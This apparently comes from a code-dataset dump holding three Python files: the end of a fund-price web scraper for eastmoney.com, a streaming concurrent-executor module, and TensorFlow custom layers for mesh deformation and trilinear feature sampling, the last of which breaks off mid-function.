    """
    url = 'http://fund.eastmoney.com/allfund.html'
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
    res = requests.get(url,headers=headers)
    soup = BeautifulSoup(res.content, 'lxml',from_encoding="gb18030")
    all_info = soup.find_all('ul', class_='num_right')
    fund_info = [[],[],[]]
    for e in all_info:
        el = e.find_all('a')
        for single in el:
            try:
                s_url = single['href']
                s_text = single.get_text()
                number = s_text.split(')')[0][1:]
                name = s_text.split(')')[1]
            except:
                # Skip anchors that don't match the "(code)name" pattern.
                continue
            fund_info[0].append(number)
            fund_info[1].append(name)
            fund_info[2].append(s_url)
    pickle.dump(fund_info,open('fund_info.pkl','wb'))
# Load the fund-info cache, scraping and creating it first if missing.
if os.path.exists('./fund_info.pkl'):
    fund_info = pickle.load(open('fund_info.pkl','rb'))
    # print('INFO--基金信息缓存导入成功')
else:
    print('正在创建基金信息表')
    get_allinfo()
    print('INFO--基金信息表创建成功')
    fund_info = pickle.load(open('fund_info.pkl','rb'))
    print('INFO--基金信息缓存导入成功')
# Fetch a fund's net value and estimated value from its detail page.
def get_value(url,executable_path):
    """Scrape (estimate %, estimate time, net value, net-value date) from *url*
    using a PhantomJS browser located at *executable_path*.

    NOTE(review): *headers* is a leftover from the earlier requests-based
    implementation (commented out below) and is currently unused.
    """
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
    #proxies={'http':'http://113.195.20.205:9999','http':'http://123.55.102.44:9999'}
    #res = requests.get(url,headers=headers,proxies=proxies)
    browser = webdriver.PhantomJS(executable_path=executable_path)
    # browser = webdriver.Chrome(options=chrome_options)
    browser.get(url)
    # Dismiss the page's popup by clicking its button, then wait for render.
    js = 'document.getElementsByClassName("ip_tips_btn")[1].getElementsByTagName("span")[0].click()'
    browser.execute_script(js)
    time.sleep(wait_time)
    res = browser.page_source
    soup = BeautifulSoup(res, 'html.parser',from_encoding="gb18030")
    dataOfFund = soup.find_all('div', class_='dataOfFund')
    guzhi = dataOfFund[0].select('#gz_gszzl')[0].get_text()
    gutime = dataOfFund[0].select('#gz_gztime')[0].get_text()[5:]
    jing = dataOfFund[0].find_all('span',class_='ui-font-middle')[4]
    jingzhi = jing.get_text()
    jingzhi_t = soup.find_all('dl', class_='dataItem02')
    # The net-value date sits between '</span>' and ')' in this element.
    jingtime = re.findall('\</span>(.*?)\)',str(jingzhi_t[0]))[0][14:]
    return guzhi,gutime,jingzhi,jingtime
def getUrl(no):
    """Look up a fund's (name, detail-page URL) by fund code *no*.

    Returns the first matching entry; when no code matches, falls back to
    the first cached fund (preserving the original behavior, where the
    default index 0 was used).  Fix: the original loop scanned the whole
    list even after a match; we now return as soon as one is found.
    """
    for number, name, url in zip(fund_info[0], fund_info[1], fund_info[2]):
        if str(number) == str(no):
            return name, url
    return fund_info[1][0], fund_info[2][0]
def getDapan(executable_path):
    """Scrape index quotes (price, change %) for the Shanghai Composite,
    Shenzhen Component and ChiNext indices from eastmoney's market page.

    Returns six strings in the order:
    (shanghai_price, shanghai_change, shenzhen_price, shenzhen_change,
     chinext_price, chinext_change).

    NOTE(review): *headers* is unused since the switch to PhantomJS.
    """
    url = 'http://quote.eastmoney.com/center/qqzs.html'
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
    browser = webdriver.PhantomJS(executable_path=executable_path)
    # browser = webdriver.Chrome(chrome_options=chrome_options)
    browser.get(url)
    res = browser.page_source
    soup = BeautifulSoup(res, 'lxml',from_encoding="gb18030")
    dataTables = soup.find_all('tbody')
    # Fixed cell positions in the first table: 0/1 Shanghai, 2/3 Shenzhen,
    # 6/7 ChiNext (price, change).
    jiage = dataTables[0].find_all('td','mywidth2')
    shangz_jg = jiage[0].get_text()
    shangz_zd = jiage[1].get_text()
    shenz_jg = jiage[2].get_text()
    shenz_zd = jiage[3].get_text()
    chuangyb_jg = jiage[6].get_text()
    chuangyb_zd = jiage[7].get_text()
    return shangz_jg,shangz_zd,shenz_jg,shenz_zd,chuangyb_jg,chuangyb_zd
# Colorize a fund percentage string for terminal display: red for gains
# (with a '+' prefix when flag == 1, i.e. net value), green for losses,
# white for flat or missing ('--') values.
def compareNum(s,flag=0):
    """Return *s* wrapped in a terminal color based on its sign.

    *s* is a percentage string ending in '%' (or '--' when unavailable);
    *flag* == 1 adds a '+' prefix to positive net values.
    """
    palette = Colored()
    if s == '--':
        return palette.white(s)
    value = float(str(s)[:-1])
    if value > 0.00:
        return palette.red('+' + s) if flag == 1 else palette.red(s)
    if value < 0.00:
        return palette.green(s)
    return palette.white(s)
# Colorize a market-index (change, price) pair by the sign of the change.
def compareDapanNum(s1,s2):
    """Return (colored s1, colored s2) based on the sign of *s1*.

    *s1* is the percentage change string (ends in '%'); *s2* is the price.
    Positive changes get a '+' prefix and red; negative green; flat white.
    """
    palette = Colored()
    change = float(str(s1)[:-1])
    if change > 0.00:
        return palette.red('+' + s1), palette.red(s2)
    if change < 0.00:
        return palette.green(s1), palette.green(s2)
    return palette.white(s1), palette.white(s2)
# Main flow: read fund codes from ./my.txt (one per line), fetch market
# indices and per-fund values, then print two colorized tables.
if os.path.exists('./my.txt'):
    f = open('./my.txt','r')
    shangz_jg,shangz_zd,shenz_jg,shenz_zd,chuangyb_jg,chuangyb_zd = getDapan(executable_path)
    shangz_zd,shangz_jg = compareDapanNum(shangz_zd,shangz_jg)
    shenz_zd,shenz_jg = compareDapanNum(shenz_zd,shenz_jg)
    chuangyb_zd,chuangyb_jg = compareDapanNum(chuangyb_zd,chuangyb_jg)
    tb = pt.PrettyTable()
    tb.field_names = ["基金代码", "基金名称", "估值", "估值更新", "净值", "净值更新"]
    content = f.readlines()
    for i in content:
        # Strip the trailing newline from each fund code.
        if str(i).endswith('\n'):
            i = i[:-1]
        tmpName,tmpUrl = getUrl(str(i))
        try:
            guzhi,gutime,jingzhi,jingtime = get_value(tmpUrl, executable_path)
        except:
            # Skip funds whose detail page failed to scrape.
            continue
        guzhi = compareNum(guzhi,flag=0)
        jingzhi = compareNum(jingzhi,flag=1)
        tb.add_row([i,tmpName,guzhi,gutime,jingzhi,jingtime])
    tb1 = pt.PrettyTable(['大盘','上证指数','深证成指','创业板指'])
    tb1.add_row(['价格',shangz_jg,shenz_jg,chuangyb_jg])
    tb1.add_row(['涨幅',shangz_zd,shenz_zd,chuangyb_zd])
    print(tb1)
    print(tb)
else:
    print('请在执行目录下创建my.txt,并按格式写入内容')
    print('格式:每行填写一个基金号码,结尾不留空行,以utf-8编码保存')
    print('创建成功后请重新执行此程序')
33e151bf11eaa61f605f33dd483e62cdd9902fec | 6,161 | py | Python | src/streamexecutors/stream.py | pkch/executors | 326677ab98de374314bfa76e75624a705c34bdda | [
"MIT"
] | 1 | 2017-07-17T14:11:18.000Z | 2017-07-17T14:11:18.000Z | src/streamexecutors/stream.py | pkch/executors | 326677ab98de374314bfa76e75624a705c34bdda | [
"MIT"
] | 3 | 2017-05-29T10:24:36.000Z | 2017-05-30T09:20:11.000Z | src/streamexecutors/stream.py | pkch/executors | 326677ab98de374314bfa76e75624a705c34bdda | [
"MIT"
] | 1 | 2020-11-21T18:53:52.000Z | 2020-11-21T18:53:52.000Z | import time
from queue import Queue, Full, Empty
from concurrent.futures import Executor, ThreadPoolExecutor, ProcessPoolExecutor
from concurrent.futures.process import _get_chunks, _process_chunk
from functools import partial
import sys
import contextlib
import threading
import itertools
class StreamExecutor(Executor):
    """Executor mixin whose map() streams inputs lazily through a bounded
    buffer of futures instead of submitting the whole input up front."""
    def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
        """Returns an iterator equivalent to map(fn, iter).
        Args:
            fn: A callable that will take as many arguments as there are
                passed iterables.
            timeout: The maximum number of seconds to wait. If None, then there
                is no limit on the wait time.
            chunksize: The size of the chunks the iterable will be broken into
                before being passed to a child process. This argument is only
                used by ProcessPoolExecutor; it is ignored by
                ThreadPoolExecutor.
            buffer_size: The maximum number of input items that may be
                stored at once; default is a small buffer; None for no limit
                (values <= 0 raise ValueError). The
                drawback of using a large buffer is the possibility of wasted
                computation and memory (in case not all input is needed), as
                well as higher peak memory usage.
        Returns:
            An iterator equivalent to: map(func, *iterables) but the calls may
            be evaluated out-of-order.
        Raises:
            TimeoutError: If the entire result iterator could not be generated
                before the given timeout.
            Exception: If fn(*args) raises for any values.
        """
        if not callable(fn):
            raise TypeError('fn argument must be a callable')
        if timeout is None:
            end_time = None
        else:
            end_time = timeout + time.time()
        if buffer_size is None:
            buffer_size = -1  # Queue(maxsize=-1) is unbounded.
        elif buffer_size <= 0:
            raise ValueError('buffer_size must be a positive number')
        current_thread = threading.current_thread()
        iterators = [iter(iterable) for iterable in iterables]
        # Deadlocks on the two queues are avoided using the following rule.
        # The writer guarantees to place a sentinel value into the buffer
        # before exiting, and to write nothing after that; the reader
        # guarantees to read the queue until it encounters a sentinel value
        # and to stop reading after that. Any value of type BaseException is
        # treated as a sentinel.
        future_buffer = Queue(maxsize=buffer_size)
        # Shared cancellation flag between the feeder thread and Producer.
        cancel = False
        # This function will run in a separate thread.
        def consume_inputs():
            nonlocal cancel
            while not cancel:
                future = None
                try:
                    args = [next(iterator) for iterator in iterators]
                except BaseException as e:
                    # StopIteration represents exhausted input; any other
                    # exception is due to an error in the input generator. We
                    # forward the exception downstream so it can be raised
                    # when client iterates through the result of map.
                    future = e
                if not future:
                    try:
                        future = self.submit(fn, *args)
                    except BaseException as e:
                        # E.g., RuntimeError from shut down executor.
                        # Forward the new exception downstream.
                        future = e
                while True:
                    try:
                        future_buffer.put(future, timeout=1)
                    except Full:
                        # Periodically re-check for cancellation / dead main
                        # thread so we don't block forever on a full buffer.
                        if cancel or not current_thread.is_alive():
                            cancel = True
                            break
                        else:
                            continue
                    if isinstance(future, BaseException):
                        return
                    else:
                        break
            # Cancelled: drain the buffer and cancel any pending futures.
            while True:
                try:
                    future = future_buffer.get(block=False)
                except Empty:
                    return
                if isinstance(future, BaseException):
                    return
                future.cancel()
        # Instances of this class will be created and their methods executed in the main thread.
        class Producer:
            def __next__(self):
                nonlocal cancel
                future = future_buffer.get()
                if isinstance(future, BaseException):
                    # Reraise upstream exceptions at the map call site.
                    raise future
                if end_time is None:
                    remaining_timeout = None
                else:
                    remaining_timeout = end_time - time.time()
                # Any exceptions (errors in the callable fn, TimeOut,
                # GeneratorExit) will be raised at map call site.
                try:
                    return future.result(remaining_timeout)
                except BaseException:
                    cancel = True
                    raise
            def __iter__(self):
                return self
            def __del__(self):
                # Dropping the iterator cancels the feeder thread.
                nonlocal cancel
                cancel = True
        thread = threading.Thread(target=consume_inputs)
        thread.start()
        return Producer()
class StreamThreadPoolExecutor(StreamExecutor, ThreadPoolExecutor): ...  # thread-backed executor with streaming map()
class StreamProcessPoolExecutor(StreamExecutor, ProcessPoolExecutor):
    """Process-backed executor with streaming map(); inputs are chunked
    exactly like ProcessPoolExecutor.map to amortize IPC overhead."""
    def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
        if buffer_size is not None:
            # The buffer holds chunk futures, so scale its item budget down.
            buffer_size //= max(1, chunksize)
        if chunksize < 1:
            raise ValueError("chunksize must be >= 1.")
        results = super().map(partial(_process_chunk, fn),
                              _get_chunks(*iterables, chunksize=chunksize),
                              timeout=timeout, buffer_size=buffer_size)
        # Each result is a chunk (list); flatten back to individual items.
        return itertools.chain.from_iterable(results)
| 41.073333 | 96 | 0.557377 | 5,863 | 0.951631 | 0 | 0 | 0 | 0 | 0 | 0 | 2,285 | 0.370881 |
33e2f0f698434b23dcdf1b8b069d6bb70c09f05a | 29,581 | py | Python | src/custom_layers.py | fkong7/HeartFFDNet | 8257ce71a0a3449d1b3a7c040699af3da35bd4b5 | [
"Apache-2.0"
] | 12 | 2021-07-13T17:40:17.000Z | 2022-03-05T12:13:30.000Z | src/custom_layers.py | fkong7/HeartFFDNet | 8257ce71a0a3449d1b3a7c040699af3da35bd4b5 | [
"Apache-2.0"
] | 2 | 2022-03-03T15:17:58.000Z | 2022-03-22T09:22:46.000Z | src/custom_layers.py | fkong7/HeartFFDNet | 8257ce71a0a3449d1b3a7c040699af3da35bd4b5 | [
"Apache-2.0"
] | 2 | 2021-09-28T14:56:04.000Z | 2021-11-18T09:52:44.000Z | #Copyright (C) 2021 Fanwei Kong, Shawn C. Shadden, University of California, Berkeley
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import tensorflow as tf
import tensorflow.contrib as tfcontrib
from tensorflow.python.keras import layers
from tensorflow.python.keras import models
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import regularizers
import tf_utils
import numpy as np
def dot(x, y, sparse=False):
    """Wrapper for tf.matmul (sparse vs dense).

    sparse=True: contracts sparse ``x`` with dense ``y`` along axis 1 via
    tf_utils.sparse_tensor_dense_tensordot, then transposes the result back
    to batch-first order.  sparse=False: plain tf.tensordot over one axis.
    """
    if sparse:
        # res = tf.sparse_tensor_dense_matmul(x, y)
        res = tf_utils.sparse_tensor_dense_tensordot(x, y, axes=[[1], [1]])
        res = tf.transpose(res, perm=[1,0,2])
    else:
        # res = tf.matmul(x, y)
        res = tf.tensordot(x, y, axes=1)
        #res = tf.transpose(res, perm=[1,0,2])
    return res
from math import factorial
def comb(n, k):
    """Return the binomial coefficient C(n, k) as a float.

    Fix: the previous chained float division
    (factorial(n) / factorial(k) / factorial(n - k)) loses precision and can
    overflow to inf for large n; math.comb computes the value exactly in
    integer arithmetic.  The result is cast to float to preserve the original
    return type.  (math.comb additionally returns 0 for k > n instead of
    raising, which is the standard convention.)
    """
    from math import comb as _exact_comb  # local: file only imports factorial
    return float(_exact_comb(n, k))
class MatMul(layers.Layer):
    """Keras layer multiplying the input by a fixed matrix.

    sparse=True routes through the sparse dot() helper; otherwise the
    matrix is lifted to a constant with a leading batch axis and tf.matmul
    broadcasts it over the batch.
    """
    def __init__(self,matrix, sparse=False, **kwargs):
        super(MatMul, self).__init__(**kwargs)
        self.matrix = matrix
        self.sparse = sparse
    def get_config(self):
        config = {'matrix': self.matrix, 'sparse': self.sparse}
        base_config = super(MatMul, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        super(MatMul, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        if self.sparse:
            output = dot(self.matrix, x, self.sparse)
        else:
            matrix = tf.expand_dims(tf.constant(self.matrix, tf.float32), axis=0)
            output = tf.matmul(matrix, x)
        return output
    def compute_output_shape(self, input_shape):
        # NOTE(review): tf.identity on a shape and item assignment look
        # suspect; presumably input_shape arrives as a mutable sequence
        # here — verify against how Keras invokes this method.
        output_shape = tf.identity(input_shape)
        output_shape[1] = self.matrix.get_shape().as_list()[1]
        return output_shape
class FFD(layers.Layer):
    """Free-form deformation layer: maps control-point inputs through a
    (sparse) FFD basis matrix, after optional per-coordinate scaling and
    offset subtraction."""
    def __init__(self,ffd_matrix,scale_vec=None, offset=None, **kwargs):
        super(FFD, self).__init__(**kwargs)
        self.ffd_matrix = ffd_matrix
        # Constants get a leading batch axis so they broadcast in call().
        self.scale_vec = tf.expand_dims(tf.constant(scale_vec, tf.float32), axis=0) if scale_vec is not None else None
        self.offset = tf.expand_dims(tf.constant(offset, tf.float32), axis=0) if offset is not None else None
    def get_config(self):
        config = {'ffd_matrix': self.ffd_matrix, 'scale_vec': self.scale_vec,
                'offset': self.offset}
        base_config = super(FFD, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        self.batch_size = input_shape[0]
        super(FFD, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        if self.scale_vec is not None:
            x = x * self.scale_vec
        if self.offset is not None:
            x = x - self.offset
        # Sparse contraction with the FFD basis matrix.
        dx = dot(self.ffd_matrix, x, sparse=True)
        return dx
    def compute_output_shape(self, input_shape):
        # NOTE(review): same tf.identity/item-assignment pattern as MatMul;
        # confirm input_shape is a mutable sequence at call time.
        output_shape = tf.identity(input_shape)
        output_shape[1] = self.ffd_matrix.get_shape().as_list()[0]
        return output_shape
class RBFD(layers.Layer):
    """RBF-style deformation layer.

    Takes [d_grid_coords, mesh_coords], projects grid displacements onto
    mesh vertices via a fixed RBF matrix, and returns the displaced mesh.
    """
    def __init__(self,rbf_matrix, **kwargs):
        self.rbf_matrix = rbf_matrix
        super(RBFD, self).__init__(**kwargs)
    def get_config(self):
        config = {'rbf_matrix': self.rbf_matrix}
        base_config = super(RBFD, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        # Expects a list of two input shapes (see call()).
        assert isinstance(input_shape, list)
        self.batch_size = input_shape[0][0]
        super(RBFD, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        d_grid_coords, mesh_coords= x
        # Batched matmul: rbf_matrix broadcast over the batch axis.
        d_mesh = tf.matmul(tf.expand_dims(tf.constant(self.rbf_matrix, dtype=tf.float32), axis=0), d_grid_coords)
        deformed = mesh_coords + d_mesh
        return deformed
    def compute_output_shape(self, input_shape):
        # Output has the shape of the mesh_coords input (the last element).
        return input_shape[-1]
class Tile(layers.Layer):
    """Keras layer wrapping tf.tile with a fixed `repeats` multiplier."""
    def __init__(self, repeats,**kwargs):
        super(Tile, self).__init__(**kwargs)
        self.repeats = repeats
    def get_config(self):
        config = {'repeats': self.repeats}
        base_config = super(Tile, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def call(self, x):
        x = tf.tile(x, self.repeats)
        return x
class Gather(layers.Layer):
    """Keras layer selecting a fixed set of indices along axis 1
    (e.g. sampling a subset of mesh vertices)."""
    def __init__(self, gather_index, **kwargs):
        super(Gather, self).__init__(**kwargs)
        self.gather_index = gather_index
    def get_config(self):
        config = {'gather_index': self.gather_index}
        base_config = super(Gather, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        super(Gather, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        sample = tf.gather(x, tf.constant(self.gather_index, dtype=tf.int32), axis=1)
        return sample
class Translate(layers.Layer):
    """Applies a per-sample 3-D translation to a point set and also returns
    the centroid of the translated points.
    """
    def __init__(self, **kwargs):
        super(Translate, self).__init__(**kwargs)
    def get_config(self):
        # No extra parameters beyond the base layer config.
        base_config = super(Translate, self).get_config()
        return dict(list(base_config.items()))
    def call(self, x):
        # x = [trans, coords]; trans carries one (x, y, z) offset per sample.
        trans, coords = x
        batch_size = coords.get_shape().as_list()[0]
        trans = tf.reshape(trans, [batch_size, 1, 3])
        coords += trans
        # Mean over the point axis gives the centroid of the shifted cloud.
        center = tf.reduce_mean(coords, axis=1, keepdims=True)
        #center = tf.Print(center, [trans, center], message="trans, center")
        return [center, coords]
    def build(self, input_shape):
        super(Translate, self).build(input_shape)  # Be sure to call this at the end
    def compute_output_shape(self, input_shape):
        # NOTE(review): `center` is (batch, 1, 3), so returning the input
        # shapes unchanged is only approximate for the first output.
        return input_shape
class ExpandDim(layers.Layer):
    """Keras wrapper around ``tf.expand_dims``: inserts a length-1 axis at
    ``axis``.
    """
    def __init__(self, axis=0, **kwargs):
        super(ExpandDim, self).__init__(**kwargs)
        self.axis = axis
    def get_config(self):
        config = {'axis': self.axis}
        base_config = super(ExpandDim, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def call(self, x):
        x = tf.expand_dims(x, axis=self.axis)
        return x
    def compute_output_shape(self, input_shape):
        # Bug fix: list.append() / list.insert() return None, so the previous
        # implementation (`input_shape = list(...).append(1)`) always
        # returned None. Mutate a copy, then return the copy.
        output_shape = list(input_shape)
        if self.axis == -1:
            output_shape.append(1)
        else:
            output_shape.insert(self.axis, 1)
        return tuple(output_shape)
class Split(layers.Layer):
    """Keras wrapper around ``tf.split``: splits the input into ``num`` equal
    chunks along ``axis``.
    """
    def __init__(self, axis=-1, num=1, **kwargs):
        super(Split, self).__init__(**kwargs)
        self.axis = axis
        self.num = num
    def get_config(self):
        config = {'axis': self.axis, 'num': self.num}
        base_config = super(Split, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        super(Split, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        x = tf.split(x, self.num, axis=self.axis)
        return x
    def compute_output_shape(self, input_shape):
        # Bug fix: the previous version mutated the caller's shape object and
        # appended the *same* list reference `num` times, so all returned
        # shapes aliased one another. Build independent copies instead.
        split_shape = list(input_shape)
        split_shape[self.axis] = split_shape[self.axis] // self.num
        return [tuple(split_shape) for _ in range(self.num)]
class ImageWarped(layers.Layer):
    """Samples a 3-D image at warped (normalized) grid coordinates using
    trilinear interpolation.
    Inputs: [image_inputs, image_grid] where image_grid holds normalized
    (x, y, z) sample positions that are scaled by ``size``.
    """
    def __init__(self, size=(128, 128, 128), **kwargs):
        # Default changed from a mutable list to a tuple (shared mutable
        # defaults persist across instances); values are identical.
        super(ImageWarped, self).__init__(**kwargs)
        self.size = size
    def get_config(self):
        config = {'size': self.size}
        base_config = super(ImageWarped, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        # input shapes: [image shape, grid shape]; only the batch size is kept.
        assert isinstance(input_shape, list)
        self.batch_size = input_shape[-1][0]
        super(ImageWarped, self).build(input_shape)  # Be sure to call this at the end
    def call(self, inputs):
        image_inputs, image_grid = inputs
        # Scale normalized grid coordinates to voxel indices.
        factor = tf.constant([[[self.size[0], self.size[1], self.size[2]]]], dtype=tf.float32)
        # TODO: change to zero diff when oob
        indices = image_grid * factor
        # Clamp so floor/ceil neighbours stay inside the volume.
        indices = tf.clip_by_value(indices, clip_value_min=0.001, clip_value_max=tf.reduce_min(factor)-1.001)
        x1 = tf.floor(indices[:,:,0])
        x2 = tf.ceil(indices[:,:,0])
        y1 = tf.floor(indices[:,:,1])
        y2 = tf.ceil(indices[:,:,1])
        z1 = tf.floor(indices[:,:,2])
        z2 = tf.ceil(indices[:,:,2])
        # Trilinear interpolation: first the z1 plane (two lerps in x, one in y).
        q11 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y1, z1], axis=-1), tf.int32))
        q21 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y1, z1], axis=-1), tf.int32))
        q12 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y2, z1], axis=-1), tf.int32))
        q22 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y2, z1], axis=-1), tf.int32))
        wx = tf.expand_dims(tf.subtract(indices[:,:,0], x1), -1)
        wx2 = tf.expand_dims(tf.subtract(x2, indices[:,:,0]), -1)
        lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
        lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
        wy = tf.expand_dims(tf.subtract(indices[:,:,1], y1), -1)
        wy2 = tf.expand_dims(tf.subtract(y2, indices[:,:,1]), -1)
        lerp_y1 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
        # Same for the z2 plane.
        q11 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y1, z2], axis=-1), tf.int32))
        q21 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y1, z2], axis=-1), tf.int32))
        q12 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y2, z2], axis=-1), tf.int32))
        q22 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y2, z2], axis=-1), tf.int32))
        lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
        lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
        lerp_y2 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
        # Finally interpolate between the two planes along z.
        wz = tf.expand_dims(tf.subtract(indices[:,:,2], z1), -1)
        wz2 = tf.expand_dims(tf.subtract(z2, indices[:,:,2]),-1)
        deformed = tf.add(tf.multiply(lerp_y2, wz), tf.multiply(lerp_y1, wz2))
        return deformed
    def compute_output_shape(self, input_shape):
        # Bug fix: tf.identity() converts the shape to a Tensor, which does
        # not support item assignment; copy the grid shape to a list instead.
        output_shape = list(input_shape[-1])
        output_shape[-1] = 1
        return tuple(output_shape)
class SplitMeshByIDs(layers.Layer):
    """Slices a packed mesh tensor into per-mesh tensors using the
    cumulative vertex offsets in ``id_list`` (slice i is
    ``[id_list[i], id_list[i+1])`` along axis 1).
    """
    def __init__(self, id_list, **kwargs):
        super(SplitMeshByIDs, self).__init__(**kwargs)
        self.id_list = id_list
    def get_config(self):
        config = {'id_list': self.id_list}
        base_config = super(SplitMeshByIDs, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        super(SplitMeshByIDs, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        out_list = []
        for i in range(len(self.id_list)-1):
            x_i = x[:, self.id_list[i]:self.id_list[i+1], :]
            out_list.append(x_i)
        return out_list
    def compute_output_shape(self, input_shape):
        # Bug fix: tf.identity() converts the shape to a Tensor, which does
        # not support item assignment; build a fresh list per sub-mesh.
        shape_list = []
        for i in range(len(self.id_list)-1):
            mesh_shape = list(input_shape)
            mesh_shape[1] = self.id_list[i+1]-self.id_list[i]
            shape_list.append(tuple(mesh_shape))
        return shape_list
class ScalarMul(layers.Layer):
    """Multiplies every element of the input by a constant scalar factor."""
    def __init__(self, factor=1., **kwargs):
        super(ScalarMul, self).__init__(**kwargs)
        self.factor = factor
    def get_config(self):
        # Merge this layer's parameters into the base-layer config.
        merged = dict(super(ScalarMul, self).get_config())
        merged['factor'] = self.factor
        return merged
    def call(self, x):
        return x * self.factor
def gather_nd(features, indices):
    """Batched gather_nd workaround.
    tf1.12 does not support gather_nd with batch_dims, so an explicit
    batch-index column is prepended to every flattened lookup row.
    Assumes indices is (batch, n, k) and features' first axis is the batch
    (returns (batch, n, features_last_dim)) -- TODO confirm against callers.
    """
    ind_shape = tf.shape(indices)
    # Flatten (batch, n, k) -> (batch*n, k).
    indices = tf.reshape(indices, [ind_shape[0]*ind_shape[1], ind_shape[2]])
    # Batch index of each flattened row: row // n.
    first = tf.cast(tf.range(tf.size(indices[:,0]))/ind_shape[1], dtype=tf.int32)
    indices = tf.concat([tf.expand_dims(first, axis=-1), indices], axis=1)
    # Gather and restore the (batch, n, channels) layout.
    gather = tf.reshape(tf.gather_nd(features, indices), [ind_shape[0],ind_shape[1],tf.shape(features)[-1]])
    return gather
class Projection(layers.Layer):
    """Samples multi-resolution feature volumes at normalized mesh
    coordinates via trilinear interpolation and concatenates the sampled
    features per vertex.
    Args:
        feature_block_ids: which pyramid levels (indices into the five
            feature inputs) to sample; the level index also sets the
            0.5**level coordinate scaling.
        size: (x, y, z) extent of the full-resolution volume.
    """
    def __init__(self, feature_block_ids=None, size=(128, 128, 128), **kwargs):
        super(Projection, self).__init__(**kwargs)
        # Bug fix: the old default size=128 was unusable because call()
        # indexes size[0..2]; the old feature_block_ids=[1] was a shared
        # mutable default. Behavior for explicit callers is unchanged.
        self.feature_block_ids = [1] if feature_block_ids is None else feature_block_ids
        self.size = size
    def get_config(self):
        config = {'feature_block_ids': self.feature_block_ids, 'size': self.size}
        base_config = super(Projection, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
    def build(self, input_shape):
        # input shapes: feature volumes 0..4 followed by mesh_coords.
        assert isinstance(input_shape, list)
        self.batch_size = input_shape[-1][0]
        super(Projection, self).build(input_shape)  # Be sure to call this at the end
    def call(self, inputs):
        features0,features1,features2,features3,features4, mesh_coords= inputs
        mesh_shape = mesh_coords.get_shape().as_list()
        # Unpack packed (x, y, z) triples into an explicit point axis.
        mesh_coords = tf.reshape(mesh_coords, [mesh_shape[0], mesh_shape[1]*(mesh_shape[2]//3), 3])
        out = tf.zeros([mesh_shape[0], mesh_shape[1]*(mesh_shape[2]//3), 0], tf.float32)
        features = [features0, features1, features2, features3, features4]
        id_list = self.feature_block_ids
        features = [features[i] for i in self.feature_block_ids]
        for i, power in enumerate(id_list):
            # Scale normalized coordinates to this pyramid level's resolution.
            factor = tf.constant([[[(0.5**power)*self.size[0], (0.5**power)*self.size[1], (0.5**power)*self.size[2]]]], dtype=tf.float32)
            factor = tf.tile(factor, [tf.shape(mesh_coords)[0], 1,1])
            indices = mesh_coords * factor
            # Clamp so floor/ceil neighbours stay inside the feature volume.
            indices = tf.clip_by_value(indices, 0.01,tf.cast(tf.reduce_min(tf.shape(features[i])[1:4]), tf.float32)-1.01)
            x1 = tf.floor(indices[:,:,0])
            x2 = tf.ceil(indices[:,:,0])
            y1 = tf.floor(indices[:,:,1])
            y2 = tf.ceil(indices[:,:,1])
            z1 = tf.floor(indices[:,:,2])
            z2 = tf.ceil(indices[:,:,2])
            # Trilinear interpolation: z1 plane first.
            q11 = gather_nd(features[i], tf.cast(tf.stack([x1, y1, z1], axis=-1), tf.int32))
            q21 = gather_nd(features[i], tf.cast(tf.stack([x2, y1, z1], axis=-1), tf.int32))
            q12 = gather_nd(features[i], tf.cast(tf.stack([x1, y2, z1], axis=-1), tf.int32))
            q22 = gather_nd(features[i], tf.cast(tf.stack([x2, y2, z1], axis=-1), tf.int32))
